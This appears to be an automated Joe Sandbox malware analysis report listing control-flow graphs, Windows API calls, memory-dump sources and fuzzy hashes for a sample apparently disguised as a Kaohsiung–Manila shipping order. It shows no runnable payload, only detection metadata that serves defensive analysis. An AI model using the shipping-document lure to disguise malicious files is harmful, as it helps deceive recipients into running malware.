                                                      control_flow_graph 584 2bbae28-2bbae37 585 2bbae39-2bbae46 call 2bba14c 584->585 586 2bbae63-2bbae67 584->586 593 2bbae48 585->593 594 2bbae5c 585->594 587 2bbae7b-2bbaebc 586->587 588 2bbae69-2bbae73 586->588 595 2bbaec9-2bbaed7 587->595 596 2bbaebe-2bbaec6 587->596 588->587 642 2bbae4e call 2bbb0b0 593->642 643 2bbae4e call 2bbb0c0 593->643 594->586 597 2bbaefb-2bbaefd 595->597 598 2bbaed9-2bbaede 595->598 596->595 601 2bbaf00-2bbaf07 597->601 602 2bbaee9 598->602 603 2bbaee0-2bbaee7 call 2bba158 598->603 599 2bbae54-2bbae56 599->594 600 2bbaf98-2bbafaf 599->600 617 2bbafb1-2bbb010 600->617 605 2bbaf09-2bbaf11 601->605 606 2bbaf14-2bbaf1b 601->606 604 2bbaeeb-2bbaef9 602->604 603->604 604->601 605->606 608 2bbaf28-2bbaf31 call 2bba168 606->608 609 2bbaf1d-2bbaf25 606->609 615 2bbaf3e-2bbaf43 608->615 616 2bbaf33-2bbaf3b 608->616 609->608 618 2bbaf61-2bbaf6e 615->618 619 2bbaf45-2bbaf4c 615->619 616->615 635 2bbb012-2bbb058 617->635 624 2bbaf91-2bbaf97 618->624 625 2bbaf70-2bbaf8e 618->625 619->618 620 2bbaf4e-2bbaf5e call 2bba178 call 2bba188 619->620 620->618 625->624 637 2bbb05a-2bbb05d 635->637 638 2bbb060-2bbb08b GetModuleHandleW 635->638 637->638 639 2bbb08d-2bbb093 638->639 640 2bbb094-2bbb0a8 638->640 639->640 642->599 643->599
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02BBB07E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042562030.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2bb0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: a6eff9d0f5cab2c320ff2687bb6f6a607a624863d0b347fc2b2736aa3d09db7f
                                                      • Instruction ID: 04824bf79ca06a4fdf79055991c2feeb5e0d2e815bf8c55dd28cb5fda26787c2
                                                      • Opcode Fuzzy Hash: a6eff9d0f5cab2c320ff2687bb6f6a607a624863d0b347fc2b2736aa3d09db7f
                                                      • Instruction Fuzzy Hash: F4715670A00B058FD725DF29D4947AABBF5FF48704F108A6DD48AD7A40DBB4E845CB90
                                                      Function 02BB590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 644 2bb590c-2bb5914 645 2bb5918-2bb59d9 CreateActCtxA 644->645 647 2bb59db-2bb59e1 645->647 648 2bb59e2-2bb5a3c 645->648 647->648 655 2bb5a4b-2bb5a4f 648->655 656 2bb5a3e-2bb5a41 648->656 657 2bb5a51-2bb5a5d 655->657 658 2bb5a60-2bb5a90 655->658 656->655 657->658 662 2bb5a42-2bb5a4a 658->662 663 2bb5a92-2bb5b14 658->663 662->655
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 02BB59C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042562030.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2bb0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: bc2a388c80615b3ea675bc1be79143f41cbd9e961267ab4a9f9ef99ac23541da
                                                      • Instruction ID: f990ceb583d8ac2e757916b5f3ea9bceeb252b4712c2e482e1388321cf2eb50e
                                                      • Opcode Fuzzy Hash: bc2a388c80615b3ea675bc1be79143f41cbd9e961267ab4a9f9ef99ac23541da
                                                      • Instruction Fuzzy Hash: 804113B1C00719CBDB25CFA9C884BDDBBB5FF49304F60805AD408AB251DBB5694ACF51
                                                      Function 02BB44B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 665 2bb44b0-2bb59d9 CreateActCtxA 668 2bb59db-2bb59e1 665->668 669 2bb59e2-2bb5a3c 665->669 668->669 676 2bb5a4b-2bb5a4f 669->676 677 2bb5a3e-2bb5a41 669->677 678 2bb5a51-2bb5a5d 676->678 679 2bb5a60-2bb5a90 676->679 677->676 678->679 683 2bb5a42-2bb5a4a 679->683 684 2bb5a92-2bb5b14 679->684 683->676
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 02BB59C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042562030.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2bb0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: a9b69e443f773d492ed28a36595e02327608f644a264c9e19f8c0b889fa373e3
                                                      • Instruction ID: aa5a8f7bd7ae13581075a1bf9e480f7bcff805e30b8c921a754db5644da13c56
                                                      • Opcode Fuzzy Hash: a9b69e443f773d492ed28a36595e02327608f644a264c9e19f8c0b889fa373e3
                                                      • Instruction Fuzzy Hash: 184102B0C00619CBDB25CFA9C884BDDBBB5FF49304F60806AD408AB251DBB5694ACF91
                                                      Function 05284040 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 686 5284040-528407c 687 528412c-528414c 686->687 688 5284082-5284087 686->688 694 528414f-528415c 687->694 689 5284089-52840c0 688->689 690 52840da-5284112 CallWindowProcW 688->690 696 52840c9-52840d8 689->696 697 52840c2-52840c8 689->697 691 528411b-528412a 690->691 692 5284114-528411a 690->692 691->694 692->691 696->694 697->696
                                                      APIs
                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 05284101
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2057255515.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5280000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: CallProcWindow
                                                      • String ID:
                                                      • API String ID: 2714655100-0
                                                      • Opcode ID: a585d0f417fbe63f6580c41bce3bed5445f64c321942db729464b21a596c2e83
                                                      • Instruction ID: 7650b57690548056c1410d1d4c4df1a32a54368a92beae2cd991805b2adf3421
                                                      • Opcode Fuzzy Hash: a585d0f417fbe63f6580c41bce3bed5445f64c321942db729464b21a596c2e83
                                                      • Instruction Fuzzy Hash: 7541F9B4A103058FCB14DF99C848AAABBF5FF89314F24C459D519A7361D775A841CFA0
                                                      Function 072F3F90 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 700 72f3f90-72f3f96 701 72f3f9d-72f3fe4 700->701 702 72f3f98-72f3f9c 700->702 703 72f3fef-72f3ffe 701->703 704 72f3fe6-72f3fec 701->704 702->701 705 72f4003-72f403c DrawTextExW 703->705 706 72f4000 703->706 704->703 707 72f403e-72f4044 705->707 708 72f4045-72f4062 705->708 706->705 707->708
                                                      APIs
                                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,072F3F7D,?,?), ref: 072F402F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: DrawText
                                                      • String ID:
                                                      • API String ID: 2175133113-0
                                                      • Opcode ID: 8aa7e4eee2eef57337a8d408e716c8d0587b41b640b394d14708901883234394
                                                      • Instruction ID: de87f44d14c5fe95bda180d2f54fad7fc7a9167ee22b45979379081af535b6b8
                                                      • Opcode Fuzzy Hash: 8aa7e4eee2eef57337a8d408e716c8d0587b41b640b394d14708901883234394
                                                      • Instruction Fuzzy Hash: 6431E3B5D1034A9FDB10DF9AD884AEEFBF5FB48320F14842AE918A7210D375A545CFA0
                                                      Function 072F329C Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 711 72f329c-72f3fe4 714 72f3fef-72f3ffe 711->714 715 72f3fe6-72f3fec 711->715 716 72f4003-72f403c DrawTextExW 714->716 717 72f4000 714->717 715->714 718 72f403e-72f4044 716->718 719 72f4045-72f4062 716->719 717->716 718->719
                                                      APIs
                                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,072F3F7D,?,?), ref: 072F402F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: DrawText
                                                      • String ID:
                                                      • API String ID: 2175133113-0
                                                      • Opcode ID: 924091239ca3481bac233f6069fc2ed28ee1fb7ab22c2d0c636fa3701c3e34be
                                                      • Instruction ID: 6108db6bb22d57e08f29c04ecf3e717fea6b010b40343916d7630501a5389595
                                                      • Opcode Fuzzy Hash: 924091239ca3481bac233f6069fc2ed28ee1fb7ab22c2d0c636fa3701c3e34be
                                                      • Instruction Fuzzy Hash: B831E3B591034A9FDB10DF9AD884AAEFBF5FB48310F14842EE919A7210D375A940CFA0
                                                      Function 02BBD2FC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 722 2bbd2fc-2bbd7a4 DuplicateHandle 724 2bbd7ad-2bbd7ca 722->724 725 2bbd7a6-2bbd7ac 722->725 725->724
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02BBD6D6,?,?,?,?,?), ref: 02BBD797
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042562030.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2bb0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 6986fe973f8322d1ded6057ef3919fecf640fcd57bf61c4c5b0c26c031e52e64
                                                      • Instruction ID: 150f987a9205d85105558398f48435a0bbd579a218dc3fa7833ce31b5b79a57b
                                                      • Opcode Fuzzy Hash: 6986fe973f8322d1ded6057ef3919fecf640fcd57bf61c4c5b0c26c031e52e64
                                                      • Instruction Fuzzy Hash: 9C21E6B59002499FDB10DF9AD584AEEFBF8FF48310F14845AE918A3350D378A950CFA4
                                                      Function 02BBD709 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 728 2bbd709-2bbd7a4 DuplicateHandle 729 2bbd7ad-2bbd7ca 728->729 730 2bbd7a6-2bbd7ac 728->730 730->729
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02BBD6D6,?,?,?,?,?), ref: 02BBD797
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042562030.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2bb0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 746af8ad8ceb7963633328b8aab011e30d0815dbc6b693209e0b7f34b46e8b0f
                                                      • Instruction ID: 8e9c00a2fb48195048806d34de23648eb01a3f1f10c692793f1b3a4bccaee719
                                                      • Opcode Fuzzy Hash: 746af8ad8ceb7963633328b8aab011e30d0815dbc6b693209e0b7f34b46e8b0f
                                                      • Instruction Fuzzy Hash: 6E21E4B5D002499FDB10CFAAD584AEEBBF5FF48310F14845AE918A3210C378A940CF60
                                                      Function 02BBB018 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 733 2bbb018-2bbb058 734 2bbb05a-2bbb05d 733->734 735 2bbb060-2bbb08b GetModuleHandleW 733->735 734->735 736 2bbb08d-2bbb093 735->736 737 2bbb094-2bbb0a8 735->737 736->737
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02BBB07E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042562030.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2bb0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 633069bef843a49b9da3218e6be908fb5114a8bc01a4f2f511ae8a054282fe56
                                                      • Instruction ID: 78942f8a0c67137f9786b1bc56fbd7412270cfbe4670c5fa3724edcaa59b1c89
                                                      • Opcode Fuzzy Hash: 633069bef843a49b9da3218e6be908fb5114a8bc01a4f2f511ae8a054282fe56
                                                      • Instruction Fuzzy Hash: 2A11D2B5C002498FCB10DF9AC444BEEFBF4EF49614F10855AD969A7210D379A545CFA1
                                                      Function 072F6CC1 Relevance: 1.3, APIs: 1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,072F6B79,?,?), ref: 072F6D20
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      • Opcode ID: 9a948788d72027f508720ed31b10094d836400af7419f431dbd894dd7e7b3dd1
                                                      • Instruction ID: 78f1cca8a1175cdff2029402e67cd52aa77d7bd83866662879b5bbdb82c6c714
                                                      • Opcode Fuzzy Hash: 9a948788d72027f508720ed31b10094d836400af7419f431dbd894dd7e7b3dd1
                                                      • Instruction Fuzzy Hash: 761167B580025ACFDB10DFA9C5457DEFBF4EF49320F14855AD658A7281C338A444CFA5
                                                      Function 072F62BC Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,072F6B79,?,?), ref: 072F6D20
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      • Opcode ID: fbb5a8e4d9e092d1e782b264b82d8b239704ee34eff0f118359f34348ed478e0
                                                      • Instruction ID: be8404838daec678a80c37fe59d1d475917a603a404e5647fba3bed9de8e89b6
                                                      • Opcode Fuzzy Hash: fbb5a8e4d9e092d1e782b264b82d8b239704ee34eff0f118359f34348ed478e0
                                                      • Instruction Fuzzy Hash: 181128B58102498FCB20DF99C545BEEFBF4EB49320F10842AD558A7340D378A944CFA5
                                                      Function 011BD3D8 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042255038.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_11bd000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d5e3fe98c7808ea27667dbec4144abf9e9a2d09201745eb28a4a046959594deb
                                                      • Instruction ID: 24f5f2ad5c990b3f7841787e89644851dcd74aae3827e2d8713dad1f86e12874
                                                      • Opcode Fuzzy Hash: d5e3fe98c7808ea27667dbec4144abf9e9a2d09201745eb28a4a046959594deb
                                                      • Instruction Fuzzy Hash: 1C21F471504204DFDF0DDF58E9C0B96BF65FB98318F20C569E9090B656C33AE456C6A2
                                                      Function 011BD4C4 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042255038.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_11bd000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 49a62c61ea1a4aa01b92951c93b0a5d856b1cf10846fd093c04bf9befa5c4a0e
                                                      • Instruction ID: d5582deadbbd1f6e61aba2b943632543446673cad62b81b3e229e933947a1c54
                                                      • Opcode Fuzzy Hash: 49a62c61ea1a4aa01b92951c93b0a5d856b1cf10846fd093c04bf9befa5c4a0e
                                                      • Instruction Fuzzy Hash: CB21FF71500244DFDF0EDFA8E9C0B66BF75FB8831CF20C569E9090A256C33AD416CAA2
                                                      Function 011CD01C Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042303903.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_11cd000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b2b5a617a60bff78b57d694239ab936ba576a39108d9b0950540cd5508a48229
                                                      • Instruction ID: 6f21f884b38d47e1011b7bce318ef84cd78cb466364231237dfb2cff6db65a70
                                                      • Opcode Fuzzy Hash: b2b5a617a60bff78b57d694239ab936ba576a39108d9b0950540cd5508a48229
                                                      • Instruction Fuzzy Hash: E6210371504200DFCF19DF68E580B16BF65FB94714F20C57DD90A0B256C33AD417CAA2
                                                      Function 011CD1D4 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042303903.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_11cd000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 77df03ee98d50494645ac91188b2eef65bab53c2f0ffb9961df52231669847e1
                                                      • Instruction ID: b171bf3b60281464ee36b023768bb6df039e9faeec8e4d98c981540ea32b5ac2
                                                      • Opcode Fuzzy Hash: 77df03ee98d50494645ac91188b2eef65bab53c2f0ffb9961df52231669847e1
                                                      • Instruction Fuzzy Hash: 7D210771504204DFDF09DF98E9C0F26BB66FB94724F20C57DE9494B256C33AD406CAA2
                                                      Function 011CD006 Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042303903.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_11cd000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7605add65c8207e7dfab5427d7caa8436e914f038f0eeccf68ca54624e476ef2
                                                      • Instruction ID: 07a9a79c76acbe7c2c0721966f4c78e615f99507782e26adabeb8a20c585c276
                                                      • Opcode Fuzzy Hash: 7605add65c8207e7dfab5427d7caa8436e914f038f0eeccf68ca54624e476ef2
                                                      • Instruction Fuzzy Hash: 8B2192755083809FCB07CF58D994715BF71FB56214F28C5EAD8498F2A7C33A981ACBA2
                                                      Function 011BD3D3 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042255038.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_11bd000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                      • Instruction ID: 887521a2b2de6c9a5d49d4c0361f207a0bff3f2df2beebfed74ddfe90fd84bbd
                                                      • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                      • Instruction Fuzzy Hash: C211CD72404240CFDF0ACF44D5C4B96BF61FB84324F24C6A9D9090A656C33AE45ACBA2
                                                      Function 011BD4BF Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042255038.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_11bd000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                      • Instruction ID: ad9954620ef6471ca7d42c630a643392f512fce99149eca1b6ab5da67c4bdbf4
                                                      • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                      • Instruction Fuzzy Hash: 3911DF72404280CFCF0ACF54E5C4B56BF71FB88318F24C6A9D9490B256C33AD45ACBA2
                                                      Function 011CD1CF Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042303903.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_11cd000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction ID: ac965c1b97db6585881b8968518b773f27cf4bec12343a06f33a8a4bee5dd280
                                                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction Fuzzy Hash: 4911BB76504280DFDB06CF54D9C4B15BFA2FB84624F24C6AED8494B296C33AD40ACBA2
                                                      Function 011BD745 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042255038.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_11bd000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2bc72bf5e171e67a7c1863714e81bc0ecddc11671b01a82ed26b4c1df59be44f
                                                      • Instruction ID: 968992df521aa03c88ecb05c5005b5aa85cf3233a7ea598f097eb6123a70d8fc
                                                      • Opcode Fuzzy Hash: 2bc72bf5e171e67a7c1863714e81bc0ecddc11671b01a82ed26b4c1df59be44f
                                                      • Instruction Fuzzy Hash: EC01FC310047809AEB1C4E99DDC4BE6BF9CDF4632CF14C529EE080A246C3399400C672
                                                      Function 011BD744 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042255038.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_11bd000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ef09c3ac3752da975680b6270b9a9d8f73b5eade45262aab5a8ea3f94382a299
                                                      • Instruction ID: 2b6525d404dc3547580c36517c7549087f2068143a7049a71704243174c0c84b
                                                      • Opcode Fuzzy Hash: ef09c3ac3752da975680b6270b9a9d8f73b5eade45262aab5a8ea3f94382a299
                                                      • Instruction Fuzzy Hash: 18F0C8710047449AEB158E59D8C8BA2FFD8EF42738F18C55AEE084B286C3799840CB71

                                                      Non-executed Functions

                                                      Function 072FAA4F Relevance: 4.0, Strings: 3, Instructions: 242COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: TJbq$Te]q$xb`q
                                                      • API String ID: 0-1930611328
                                                      • Opcode ID: b65faf2db1a94980aa7eeaa074b827d440b49f3e22ad07f818b51acedf7c00b0
                                                      • Instruction ID: 1ec36d056fd6494f546445c6f32afcb317c7e1827bf562ca307ffd5eeb1ebfad
                                                      • Opcode Fuzzy Hash: b65faf2db1a94980aa7eeaa074b827d440b49f3e22ad07f818b51acedf7c00b0
                                                      • Instruction Fuzzy Hash: FFC184B5E006588FDB18CF6AC9846DDBBF2BF89300F14C1AAD409AB325DB305A85CF50
                                                      Function 072FA7B8 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4']q
                                                      • API String ID: 0-1259897404
                                                      • Opcode ID: 8a0825bdd16a1d2dbc969312d1660e68c1653d558509c3c079527f7e2b22f961
                                                      • Instruction ID: 6d7c699d5fb535249becc051c0055715e83da7269721bb301a11f8e1964e7e22
                                                      • Opcode Fuzzy Hash: 8a0825bdd16a1d2dbc969312d1660e68c1653d558509c3c079527f7e2b22f961
                                                      • Instruction Fuzzy Hash: 2E710771E152099FDB08DF7AE98169ABFF6FF88300F54C969D0089B269FB745806CB40
                                                      Function 072FA7C8 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
